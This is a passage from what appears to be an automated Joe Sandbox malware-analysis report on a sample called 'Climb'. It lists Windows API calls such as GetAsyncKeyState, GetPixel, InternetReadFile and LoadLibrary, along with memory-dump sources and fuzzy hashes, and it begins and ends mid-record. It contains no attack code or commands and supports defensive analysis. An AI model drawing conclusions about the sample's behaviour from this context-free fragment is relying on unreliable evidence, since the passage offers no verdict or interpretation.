                                                                                                                                                                          • Instruction Fuzzy Hash: 0D516BB5A00619EFCB14CF58C894EAAB7F8FF89314B058169E919DB310E730E951CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001295F3
                                                                                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0012961F
                                                                                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00129677
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0012969C
                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001296A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                          • Opcode ID: a37e91085b1bb3896f5d2eda547ae53a35eae952be0b421e94109b82c6c0013a
                                                                                                                                                                          • Instruction ID: 1a97a7a3b9414b165d8365a09606c7930f89db0df35c002e44e01fba63e8e91b
                                                                                                                                                                          • Opcode Fuzzy Hash: a37e91085b1bb3896f5d2eda547ae53a35eae952be0b421e94109b82c6c0013a
                                                                                                                                                                          • Instruction Fuzzy Hash: A7512735A00215AFCB05DF64D881AAABBF5FF49314F088098E849AB362CB35ED51CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0013999D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00139A2D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00139A49
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00139A8F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00139AAF
                                                                                                                                                                            • Part of subcall function 000CF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00121A02,?,75C0E610), ref: 000CF9F1
                                                                                                                                                                            • Part of subcall function 000CF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00110354,00000000,00000000,?,?,00121A02,?,75C0E610,?,00110354), ref: 000CFA18
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                          • Opcode ID: 685a412d14a58f83b03ff2863e25dbc367c10d0577da81c1b547539860a4d7db
                                                                                                                                                                          • Instruction ID: 793ce6e3ab18d58e0eeb4be6069d6c2cfbd91ef3093aa903a578934271092da5
                                                                                                                                                                          • Opcode Fuzzy Hash: 685a412d14a58f83b03ff2863e25dbc367c10d0577da81c1b547539860a4d7db
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C512735A042059FDB05DF68C484DEDBBB0FF09314B0581A8E80A9B762D771ED86CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0014766B
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00147682
                                                                                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001476AB
                                                                                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0012B5BE,00000000,00000000), ref: 001476D0
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001476FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3688381893-0
                                                                                                                                                                          • Opcode ID: 7275004bb32080c9437ce0538fee224e5ff40c23f852c14d055c1bee3e2b086c
                                                                                                                                                                          • Instruction ID: e45496817d7c5d080ffb402e0acdcbac86365f759e12e32223e06a5d239c8ae8
                                                                                                                                                                          • Opcode Fuzzy Hash: 7275004bb32080c9437ce0538fee224e5ff40c23f852c14d055c1bee3e2b086c
                                                                                                                                                                          • Instruction Fuzzy Hash: 5341E435A08514AFEB29DF2CCC48FA57BA6FB0A350F170264F819A72F1D770AD41DA50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 7cf673438a57872e8574bd7d6741e9d20e548d7985491851e5d8fb8f824add7a
                                                                                                                                                                          • Instruction ID: 4de63a3925a41a30bee5f96aa615333afc8684d6c47a6df3264f16df024c170f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cf673438a57872e8574bd7d6741e9d20e548d7985491851e5d8fb8f824add7a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3741D172A00204AFDB24DF79C881A9DB3F9EF89314F1585A9E615EB392D731ED41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 000B19E1
                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 000B19FE
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 000B1A23
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 000B1A3D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                          • Opcode ID: 76b0f973c849ee09f0f6d41aa02956d9ed5ddb19718216bb0a333cac4b89636c
                                                                                                                                                                          • Instruction ID: 19ca0259e73b6cf4ad1ec097656d3e8a0c35c01592fb4020d6c5e4b8220ca0ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 76b0f973c849ee09f0f6d41aa02956d9ed5ddb19718216bb0a333cac4b89636c
                                                                                                                                                                          • Instruction Fuzzy Hash: AA414B75A0410AFFDF159F64C854AFEB7B4FB05324F20821AE469A62A0C7346A94DB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetInputState.USER32 ref: 00124310
                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00124367
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00124390
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0012439A
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001243AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                          • Opcode ID: 4ac8af6182d82795ec332a45f260a74d3a83b11d686872db7af00a20e0579ac9
                                                                                                                                                                          • Instruction ID: 44b43f17c73d26b7a613e238dabc5cdc4afa850f9ebfefae60f699e9575edc5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac8af6182d82795ec332a45f260a74d3a83b11d686872db7af00a20e0579ac9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E31B770904375DFEB39DB74F849BB63BA8BB01308F040569E4A2C25A0E7B499A5CB11
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00112262
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 0011230E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00112316
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00112327
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0011232F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                          • Opcode ID: 55ba56f8f2d0351ec15748859b899e57574a3cadbb40716c3e9d522ff2863ee5
                                                                                                                                                                          • Instruction ID: d0b9f798776f8d0fd400f391d41cfdc74fc39b2f8a4df89948a8647cbd7c85c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 55ba56f8f2d0351ec15748859b899e57574a3cadbb40716c3e9d522ff2863ee5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3231E271900219EFDF08CFA8DD88ADE3BB5FB05315F004225F925A72E0C3709990CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0012CC63,00000000), ref: 0012D97D
                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0012D9B4
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0012CC63,00000000), ref: 0012D9F9
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0012CC63,00000000), ref: 0012DA0D
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0012CC63,00000000), ref: 0012DA37
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                          • Opcode ID: 1d5588f73517a6010fae2b41e16b676413f8c213b7c62c9d518a8adf86bc2e19
                                                                                                                                                                          • Instruction ID: 582562b87a1bd8acc6c8f1922ede049d7ffb765f35d17f1faeabe910ac8d1e58
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5588f73517a6010fae2b41e16b676413f8c213b7c62c9d518a8adf86bc2e19
                                                                                                                                                                          • Instruction Fuzzy Hash: 64314971A04215EFDF24DFA5F884EAABBF8EB04358B10442EF546D3250DB70EE909B60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001461E4
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0014623C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014624E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00146259
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001462B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                          • Opcode ID: ca372eb3e046a55463c6ee31e3bd0db8819c30ed51855302f7e4e2c5e6e2d623
                                                                                                                                                                          • Instruction ID: e56453d494e3e8867d1c4ccf362c10ecb49eac8a7f0e7553d0813d3cd2eda6dc
                                                                                                                                                                          • Opcode Fuzzy Hash: ca372eb3e046a55463c6ee31e3bd0db8819c30ed51855302f7e4e2c5e6e2d623
                                                                                                                                                                          • Instruction Fuzzy Hash: B021B475900218ABDF11DFA0CC84EEE77B9FF06728F104226FA25EA1A1D7709985CF51
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001313AE
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001313C5
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00131401
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 0013140D
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00131445
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                          • Opcode ID: 4b804da8e90d344fa94d401db7a4658c3a3fd940a8b91f82b26f304eccfcf8f9
                                                                                                                                                                          • Instruction ID: 4ef8783f9908d473423b5b75f2e46383b8fe9d4efb1a51968875c512aab192da
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b804da8e90d344fa94d401db7a4658c3a3fd940a8b91f82b26f304eccfcf8f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A218E3A600214AFDB04EF65D888A9EB7F5EF49750B058439E84A97762CB30AC40CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 000ED146
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000ED169
                                                                                                                                                                            • Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000ED18F
                                                                                                                                                                          • _free.LIBCMT ref: 000ED1A2
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000ED1B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: ce50b5ca33b9d75f2555f495b42575d918394203faef7581485a90c3213ff39d
                                                                                                                                                                          • Instruction ID: 3bfed67d91e40c8c404c0ab78df72600a9ca8e931cc98f2ac66c7231c7d7cbad
                                                                                                                                                                          • Opcode Fuzzy Hash: ce50b5ca33b9d75f2555f495b42575d918394203faef7581485a90c3213ff39d
                                                                                                                                                                          • Instruction Fuzzy Hash: DB01D4766026957F37216A7B6C8CD7F6AADEFC3FA1314016AFD04E2240DA608C0181B1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                          • Opcode ID: d5876796bfbaef90241d95fc418e0e3953141b6af34c64d1894cdf39c8aa60a8
                                                                                                                                                                          • Instruction ID: a809d816247a9fe514a192d2292dacf85569ca09601bab0e3afa571e22732365
                                                                                                                                                                          • Opcode Fuzzy Hash: d5876796bfbaef90241d95fc418e0e3953141b6af34c64d1894cdf39c8aa60a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 0801B1B2704705BBD61856249C82FEB736D9F5D399B014036FD0A9A243FB63ED94C2B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,000DF64E,000D545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E3170
                                                                                                                                                                          • _free.LIBCMT ref: 000E31A5
                                                                                                                                                                          • _free.LIBCMT ref: 000E31CC
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E31D9
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E31E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: aefe6b36409f7448eeea747b5a2dc9c786194c1448d2c9823321aec56a8854fb
                                                                                                                                                                          • Instruction ID: 1822d7eeebcf6bf7b8cc6306ce326b8e4797414832d80cfcb0853319adaa76aa
                                                                                                                                                                          • Opcode Fuzzy Hash: aefe6b36409f7448eeea747b5a2dc9c786194c1448d2c9823321aec56a8854fb
                                                                                                                                                                          • Instruction Fuzzy Hash: DA01F976645A802F96126737AC4DE6F1EADAFC1771321047CF915B3292EE22CA414111
                                                                                                                                                                          APIs
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?,?,00110C4E), ref: 0011091B
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110936
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110944
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?), ref: 00110954
                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110960
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
